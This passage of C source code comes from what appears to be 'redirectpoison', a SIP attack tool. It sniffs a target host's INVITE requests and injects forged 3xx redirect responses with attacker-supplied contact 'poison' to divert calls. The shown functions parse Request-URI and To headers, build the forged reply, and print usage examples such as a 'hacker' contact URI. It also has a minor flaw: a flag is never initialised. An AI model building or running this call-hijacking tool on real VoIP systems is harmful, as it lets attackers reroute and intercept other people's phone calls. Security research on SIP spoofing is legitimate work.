//                  a uri with a 'user' part
//                  then 
//                      If the user parts are identical
//                          then discard this SIP message as one
//                                    that is already carrying poison
//                                    (i.e. the requestor is presumed to have
//                                            already been poisoned by a 
//                                            prior response of this tool).
//
//  FIXME: this version of the tool does not handle abbreviated header names.
//  FIXME: this version of the tool presumes a properly formatted SIP message. 
//  FIXME: this request message parsing is going was coded quickly and
//                   can probably stand to be optimized for accuracy and execution speed.
//  FIXME: RFC 3261 permits the uri user part to be expressed using hex
//                   notation. A user part with any character expressed using hex
//                   notation is equal to that same character expressed without hex
//                   notation. This function does not assert equality between a character
//                   expressed as a simple ASCII value and one expressed with hex
//                   notation.
//
//  Inputs:
//     psSniffedSIPMsg = pointer to the SIP Request message
//          in string form.
//     psEndLine  = pointer to the '\r' character in the end
//          of line terminator (i.e. '\r\n')
//
//  Globals Input:
//     psContactUserPart = NULL or a pointer to a
//          string. If !NULL, then it points to a string
//          containing the 'user' part of the uri which
//          was entered on the command line as the
//          poison. 
//
//  Outputs:
//     An end-of-string character is temporarily inserted
//     into the request line contained within the SIP request
//     message string being processed, but the character
//     replaced by the end-of-string character is restored
//      to its former value before this function exits.
//
//  Return:
//    true  - if the redirect poison response should be
//                transmitted
//    false - if the SIP request message should be silently
//                discarded
//
//-----------------------------------------------------------------------------

bool processRequestMethodLine ( char *psSniffedSIPMsg,
                                char *psEndLine        ) {

    char *psRequestUriUserPart = NULL;
                                    
    //
    //  Temporarily replace the \r at the end of the
    //  Request method with the end-of-string character (i.e. \0).
    //
    
    *psEndLine = '\0'; 

    //
    //  Does the user part of the Request uri already
    //  exhibit a state of poisoning?
    //
    
    if ( psContactUserPart ) {
        
        //
        //  The poison specified on the command line did include
        //   a uri with a user part. Isolate and copy the user part
        //   of the Request-uri in this request method line.
        //
        
        psRequestUriUserPart = duplicateUserPartOfUri ( psSniffedSIPMsg );
        
        if ( psRequestUriUserPart ) {
            
            //
            //  The Request-uri also includes a user part.
            //
            //  RFC 3261 defines comparisons of uri userinfo content 
            //  as "case-sensitive", so a single case sensitive comparison
            //  is adequate to determine equality.
            //

            if ( !strcmp ( psContactUserPart, psRequestUriUserPart ) ) {
                
                //
                //  The Request-uri's 'user' part is identical to the 'user' part
                //  of the poison uri. The SIP request already exhibits a
                //  prior poisoning. Do not send another redirect response.
                //  Permit the call to go through to what is likely a 
                //  party to whom the tool has redirected calls.
                //

                                    // for the heck of it,
                *psEndLine = '\r';  // restore \r at end of To header line
                
                free ( psRequestUriUserPart );
                psRequestUriUserPart = NULL; // a bit anal.
                return false;
            }
            
            free ( psRequestUriUserPart );
            psRequestUriUserPart = NULL;
        }
    }
        
    *psEndLine = '\r';  // restore \r at end of To header line
    
    return true;
    
} // end processRequestMethodLine


//-----------------------------------------------------------------------------
//
//  processToHeader
//
//  Need to copy some of the SIP request message content
//  into the SIP 3xx Series redirectpoison response, but
//  need to process the To header line as follows:
//
//  o  If the poison contact information entered on the
//          command line included a uri with a 'user' part 
//          then
//              If the To header from the SIP request contains
//                  a To-uri with a 'user' part
//                  then 
//                      If the user parts are identical
//                          then discard this SIP message as one
//                                    that is already carrying poison
//                                    (i.e. the requestor is presumed to have
//                                            already been poisoned by a 
//                                            prior response of this tool).
//
//  o  If the received To: header line does not already have a ";tag=",
//            then add a tag;
//
//  FIXME: this version of the tool does not handle abbreviated header names.
//  FIXME: this version of the tool presumes a properly formatted SIP message. 
//  FIXME: this request message parsing is going was coded quickly and
//                   can probably stand to be optimized for accuracy and execution speed.
//  FIXME: RFC 3261 permits the uri user part to be expressed using hex
//                   notation. A user part with any character expressed using hex
//                   notation is equal to that same character expressed without hex
//                   notation. This function does not assert equality between a character
//                   expressed as a simple ASCII value and one expressed with hex
//                   notation.
//
//  Inputs:
//     psRedirectpoisonSIPMsg = pointer to the SIP
//          Redirect pointer to the SIP Redirect response
//          message being synthesized
//     psStartLine = pointer to the first (i.e. 0th) character
//          in the To header
//     psEndLine  = pointer to the '\r' character in the
//          end of line terminator (i.e. '\r\n')
//     psHeaderNameEnd = pointer to the last character
//          in the To header's name
//     pbCopyHeader = pointer to the boolean that will
//          inform the caller if the To header should be
//          copied to the redirect poison response being
//          synthesized by this tool.
//
//  Globals Input:
//     psContactUserPart = NULL or a pointer to a
//          string. If !NULL, then it points to a string
//          containing the 'user' part of the uri which
//          was entered on the command line as the
//          poison. 
//
//  Outputs:
//    The string pointed to by psRedirectpoisonSIPMsg
//       might have characters appended to it.
//    An end-of-string character is temporarily inserted
//        into the To header contained within the SIP
//        request message string being processed,
//        but the character replaced by the end-of-string
//        character is returned to its former value before
//        this function exits.
//
//  Return:
//    true  - if the evaluation of the SIP Request message
//                should be continued.
//    false - if the SIP request message should be silently
//                discarded
//
//-----------------------------------------------------------------------------

bool processToHeader ( char *psRedirectpoisonSIPMsg,
                       char *psStartLine,
                       char *psEndLine,
                       char *psHeaderNameEnd,
                       bool *pbCopyHeader            ) {
        
    char *psToTag         = NULL;
    char *psToUriUserPart = NULL;
    
    //
    //  Temporarily replace the \r at the end of the To header line
    //  with the end-of-string character (i.e. \0).
    //
    
    *psEndLine = '\0'; 

    //
    //  Does the user part of the To-uri in this To header already
    //  exhibit a state of poisoning?
    //
    
    if ( psContactUserPart ) {
        
        //
        //  The poison specified on the command line did include
        //   a uri with a user part. Isolate and copy the user part
        //   of the To-uri in this To header line.
        //
        
        psToUriUserPart = duplicateUserPartOfUri ( psStartLine );
        
        if ( psToUriUserPart ) {
            
            //
            //  The To-uri also includes a user part.
            //
            //  RFC 3261 defines comparisons of uri userinfo content 
            //  as "case-sensitive", so a single case sensitive comparison
            //  is adequate to determine equality.
            //
            //  FIXME: RFC 3261 permits the uri user part to be expressed
            //                  using hex notation. A user part with any character
            //                  expressed using hex notation is equal to that
            //                  same character expressed without hex notation.
            //                  This function does not assert equality between
            //                  a character expressed as a simple ASCII value
            //                  and one expressed with hex notation.
            //

            if ( !strcmp ( psContactUserPart, psToUriUserPart ) ) {
                
                //
                //  The To-uri's user part is identical to the user part of
                //  the poison uri. The SIP request already exhibits a
                //  prior poisoning. Do not send another redirect response.
                //  Permit the call to go through to what is likely a 
                //  party to whom the tool has redirected calls.
                //

                                    // for the heck of it,
                *psEndLine = '\r';  // restore \r at end of To header line
                
                free ( psToUriUserPart );
                psToUriUserPart = NULL; // a bit anal.
                *pbCopyHeader = false;  // don't copy the To header line
                return false;
            }
            
            free ( psToUriUserPart );
            psToUriUserPart = NULL;
        }
    }
    
    //
    // At this point it has been established we wish to continue
    //  processing the To header of the current SIP request.
    //
    //  Search the To header line for a to tag (i.e. ";tag="). 
    //
    
    if ( findTagParmName ( psStartLine ) ) {
        
        //
        //  a To tag parm name was found in the To header
        //  restore \r at end-of-line. So, want to simply copy
        //  the To header line to the outgoing message
        //
        
        *psEndLine = '\r';      // restore \r at end of To header line
        
        *pbCopyHeader = true;
        return true;
    }
    
    *psEndLine = '\r';  // restore \r at end of To header line
    
    //     
    //  Produce a To tag and append it to the end of the To header content
    //
    
    if ( ( psToTag = GetNextGuid ( ) ) == NULL ) {
        printf ("\nTag ID production failure\n" );
        CleanupAndExit ( EXIT_FAILURE );  // does not return here
    }

    //
    //  Note: the following copies into redirectpoisonSIPMsg must
    //            remain in two parts. The first object of the first snprintf
    //            call is not actually a string. We only wish to copy,
    //            from the To header line into the redirectpoisonSIPMsg
    //            up to, but not including, the \r\n of the end of the
    //            To header line. We have to specify a length that
    //            accommodates the characters we need, plus 1 more
    //            for the end-of-string char that snprintf adds.
    //
    
    //
    //  Strictly speaking the RFC states that a request might
    //  already have a tag on the To header. If it does, the 
    //  server is required to respond with that tag.
    //
    
    snprintf ( psRedirectpoisonSIPMsg +
               strlen ( psRedirectpoisonSIPMsg ),
               psEndLine - psStartLine + 1,
               "%s",
               psStartLine );
    
    snprintf ( psRedirectpoisonSIPMsg +
               strlen ( psRedirectpoisonSIPMsg ),
               strlen ( psToTag ) + 8,
               ";tag=%s\r\n",
               psToTag );
               
    free ( psToTag );
    psToTag = NULL;
    
    *pbCopyHeader = false;  // already copied what was needed.
    
    return true;
    
} //  end processToHeader


//-----------------------------------------------------------------------------
//
//  duplicateUserPartOfUri
//
//  Parse the input string and duplicate the user part of
//  the SIP URI the string is expected to contain.
//
//  From RFC 3261:
//
//    SIP-URI                   =  "sip:" [ userinfo ] hostport
//                                              uri-parameters [ headers ]
//    SIPS-URI                 =  "sips:" [ userinfo ] hostport
//                                              uri-parameters [ headers ]
//    userinfo                    =  ( user / telephone-subscriber ) [ ":" password ] "@"
//    user                           =  1*( unreserved / escaped / user-unreserved )
//    user-unreserved    =  "&" / "=" / "+" / "$" / "," / ";" / "?" / "/"
//    password                  =  *( unreserved / escaped /
//                                              "&" / "=" / "+" / "$" / "," )
//    hostport                    =  host [ ":" port ]
//    host                            =  hostname / IPv4address / IPv6reference
//    hostname                 =  *( domainlabel "." ) toplabel [ "." ]
//    domainlabel             =  alphanum
//                                             / alphanum *( alphanum / "-" ) alphanum
//    toplabel                      =  ALPHA / ALPHA *( alphanum / "-" ) alphanum
//
//
//  FIXME: this version of the tool presumes a properly
//                   formatted SIP URI.
//
//  FIXME: this request message parsing is going was
//                   coded quickly and can probably stand to be
//                   optimized for accuracy and execution
//                   speed.
//
//  FIXME: this parser doesn't take into account 
//                   the ramifications of escaped characters.
//
//  Inputs:
//     psURI = pointer to a string containing a SIP URI.
//
//  Return:
//    Pointer to newly allocated string containing the
//       'user' part of the URI found in the input string. 
//       The caller is responsible for deallocating memory
//       for the string.
//    NULL - if no user part is found in the input string.
//
//-----------------------------------------------------------------------------

char* duplicateUserPartOfUri ( char *psUri ) {

    char *psAt;
    char *psSemiColon;
    char *psColon;
    char *psUser;
    char *psSip;
    char *psSips;
    
    bool bFound;
    
    unsigned int start;
       
    //
    //  A sip uri begins with an optional
    //  left angle bracket, but must then
    //  be followed by 'sip:' or 'sips:'
    //
    
    psSip = strstr ( psUri, "sip:" );
    if ( !psSip ) {
        psSips = strstr ( psUri, "sips:" );
        if ( !psSips ) {
            return NULL;
        } else {
            psColon = psSips + 4;
        }
    } else {
        psColon = psSip + 3;
    }
        
    //
    //  From this point look for the first occurrence of 
    //  '@' and ';' 
    //  Use the locations of these characters in order to try to
    //  assess whether a 'user' part exists in the input string.
    //

    psAt = strchr ( psColon + 1, '@' );
    
    if ( !psAt ) {
        
        //
        //  The SIP URI BNF requires the presence of an '@'
        //  character if a 'user' part is present. 
        //
        
        return NULL;
    }

    //
    //  However, the presence of an '@' does not
    //  mean a 'user' part exists (i.e. the '@' might
    //  appear in a latter section of the URI that is
    //  not in the 'user' part).
    //
    
    psSemiColon = strchr ( psColon + 1, ';' );
    
    if ( psSemiColon ) {
        
        if ( psAt > psSemiColon ) {
            
            //
            //  The '@' looks like it is in a uri-parameter
            //  and not separating a userinfo part from the
            //  the hostport part of a uri. There can't be 
            //  a userinfo part present, presuming the
            //  uri is well-formed.
            //
            
            return NULL;
        }
    }
       
    //
    //  Find the start of the 'user' part (i.e. the 1st 
    //  non-space following the colon separating
    //  sip: or sips: from the 'user' part).
    //    
        
    for ( start = psColon + 1 - psUri;
          start < psAt - psUri - 1;
          start++ ) {
        
        //
        //   current char is not a space, not a formfeed, not a newline, ..etc?
        //
        
        if ( !isblank( psUri[start] ) ) {
            bFound = true; // found the start of uri user part
            break;
        }
    }

    if ( !bFound ) {
        
        //
        //  No non-blank characters were found between
        //  the colon and the '@' sign. So, conclude there
        //  is no 'user' part present
        //
        
        return NULL;
    }
    
    //
    //  So, we know where the start of the user part is and
    //  we know where the '@' is separating the userinfo
    //  part and the hostport part. Duplicate those characters
    //  and all characters in between them into a new string.
    //
    
    psUser =
        ( char * ) strndup ( psUri + start,
                             ( size_t ) (( psAt - psUri ) - start ) );
    
    //
    //  We know from the BNF that the userinfo section is separated
    //  from the hostport section by the '@', however, we don't want
    //  to return a string that includes optional password stuff which
    //  might be present after the user part within the userinfo part.
    //
    //  The 'user' part is separated from the optional password by
    //  a ':'
    //
    
    psColon = strchr ( psUser, ':' );
    if ( psColon ) {
        
        //
        // A password does appear to be present in the user-info
        // Shorten the new string by replacing that colon with 
        // the end-of-string character.
        //
            
        *psColon = '\0';     
    }
    
    return psUser;
    
} //  end duplicateUserPartOfUri


//-----------------------------------------------------------------------------
//
//  findTagParmName
//
//  Try to find the tag parameter name in the string
//  pointed to by psScanStart. Perform a case
//  insensitive scan for the substring ";tag="
//
//  Return a char *pointer to the semi-colon or return
//  NULL if the substring in not found.
//
//-----------------------------------------------------------------------------

char* findTagParmName ( char *psScanStart ) {
    
    char *psScanPosition;
    
    psScanPosition = psScanStart;
    
    while ( *psScanPosition )
    {
        if ( psScanPosition[0] == ';' ) {
            if ( psScanPosition[1] ) {
                if ( psScanPosition[1] == 'T' || psScanPosition[1] == 't' ) {
                    if ( psScanPosition[2] ) {
                        if ( psScanPosition[2] == 'A' || psScanPosition[2] == 'a' ) {
                            if ( psScanPosition[3] ) {
                                if ( psScanPosition[3] == 'G' || psScanPosition[3] == 'g' ) {
                                    if ( psScanPosition[4] ) {
                                        if ( psScanPosition[4] == '=' ) {
                                            return ( psScanPosition );
                                        } else {
                                            psScanPosition++;
                                        }
                                    } else {
                                        return NULL; // at end of string
                                    }
                                } else {
                                    psScanPosition++;
                                }
                            } else {
                                return NULL; // at end of string
                            }
                        } else {
                            psScanPosition++;
                        }
                    } else {
                        return NULL; // at end of string
                    }
                } else {
                    psScanPosition++;
                }
            } else {
                return NULL;
            }
        } else {
            psScanPosition++;
        }
    } // end while ( ) 

    return NULL;
} // end  findTagParmName


//-----------------------------------------------------------------------------
//
// catch_signals ( int signo )
//
// signal catcher and handler
//
//-----------------------------------------------------------------------------

void catch_signals ( int signo ) {
    switch ( signo ) {
        case	SIGINT:
        case	SIGTERM: {
            printf ( "\nexiting...\n" );
            CleanupAndExit ( EXIT_SUCCESS );
        }
    }
} // end catch_signals

//-----------------------------------------------------------------------------
//
// CleanupAndExit ( int status )
//
// Clean up and exit.
//
//-----------------------------------------------------------------------------

void CleanupAndExit ( int status ) {
   
    if ( h_pcap_live_sip ) {
        if ( bVerbose ) {
            printf ( "\nclosing live pcap sip interface\n" );
        }
        pcap_close ( h_pcap_live_sip );
        h_pcap_live_sip = NULL;
    }
    
    if ( l ) {
        if ( bVerbose ) {
            printf ( "\ndestroying libnet handle\n" );
        }
        libnet_destroy ( l );
        l = NULL;
    }
    
    if ( sockfd > 0 ) {
        if ( bVerbose ) {
            printf ( "\nclosing socket used to obtain device MAC addr\n" );
        }
        close( sockfd );
        sockfd = 0;
    }
    
    if ( psContactUserPart ) {
        if ( bVerbose ) {
            printf ( "\ndeallocating memory for string containing poison user part\n" );
        }
        free ( psContactUserPart );
        psContactUserPart = NULL;
    }
        
    printf ( "\nNumber of packets sniffed from target = %u\n",
             numPacketsRead );
    
    printf ( "\nNumber of INVITE requests sniffed from target = %u\n",
             numInviteRequestsRead );
    
    printf ( "\nNumber of poisoned redirect replies transmitted to target = %u\n",
             numSIPRequestsPoisoned );
      
    printf ( "\n" );

    exit ( status );
} // End CleanupAndExit

//-------------------------------------------------------------------------------
//
// usage ( int status )
//
// Display command line usage.
//
//-------------------------------------------------------------------------------

void usage ( int status ) {
    printf ( "\n%s", __REDIRECTPOISON_VERSION );
    printf ( "\n%s", __REDIRECTPOISON_DATE    );
    printf ( "\n Usage:"                                                      );
    printf ( "\n Mandatory -"                                                 );
    printf ( "\n\tinterface (e.g. eth0)"                                      );    
    printf ( "\n\ttarget source IPv4 addr"                                    );
    printf ( "\n\ttarget source port"                                         );
    printf ( "\n\t\"contact information\" (i.e. the poison)"                  );
    printf ( "\n\t    A string enclosed by dbl quotes. Contact information"   );
    printf ( "\n\t    is used as-is (i.e. no validity parsing is performed)"  );
    printf ( "\n\t    Examples: \"<sip:fooledya@bogus.com>\""                 );
    printf ( "\n\t              \"hacker <sips:hackedyou@188.55.128.10>\""    );
    printf ( "\n\t              \"<sip:6000@10.1.101.60>\""                   );
    printf ( "\n\t              \"voicemail <sip:4500@192.168.20.5;transport=udp>\""    );
    printf ( "\n\t              \"<sip:4500@192.168.20.5:\\\"secret\\\">\""   );
    printf ( "\n\t              \"<sip:100.77.50.52;line=xtrfgy>\""           );
    printf ( "\n\t              Note: the last example did not include a"     );
    printf ( "\n\t                    'user' part in the URI. The tool"       );
    printf ( "\n\t                    detects if a SIP request received from" );
    printf ( "\n\t                    the targeted host already exhibits"     );
    printf ( "\n\t                    poisoning by comparing the user part"   );
    printf ( "\n\t                    from the poison with the user part in:" );
    printf ( "\n\t                      1) the Request-URI"                   );
    printf ( "\n\t                      2) the To-URI"                        );
    printf ( "\n\t                    If the user part of either URI equals"  );
    printf ( "\n\t                    the user part from the poison, then the");
    printf ( "\n\t                    tool remains quiet in that instance."   );
    printf ( "\n\t                    Presumably, the target is issuing a new");
    printf ( "\n\t                    SIP request to a redirected party and"  );
    printf ( "\n\t                    the tool user wishes that transaction"  );
    printf ( "\n\t                    to proceed without additional"          );
    printf ( "\n\t                    interference. If you don't specify a"   );
    printf ( "\n\t                    user part in the contact poison, then"  );
    printf ( "\n\t                    pre-poisoning detection logix is"       );
    printf ( "\n\t                    disabled and the tool reacts to every"  );
    printf ( "\n\t                    INVITE request it detects from the"     );
    printf ( "\n\t                    target source IP:port."                 );
    printf ( "\n Optional -"                                                  );
    printf ( "\n\t-h help - print this usage"                                 );
    printf ( "\n\t-v verbose output mode"                                     );
    printf ( "\n"                                                             );

    exit ( status );
}
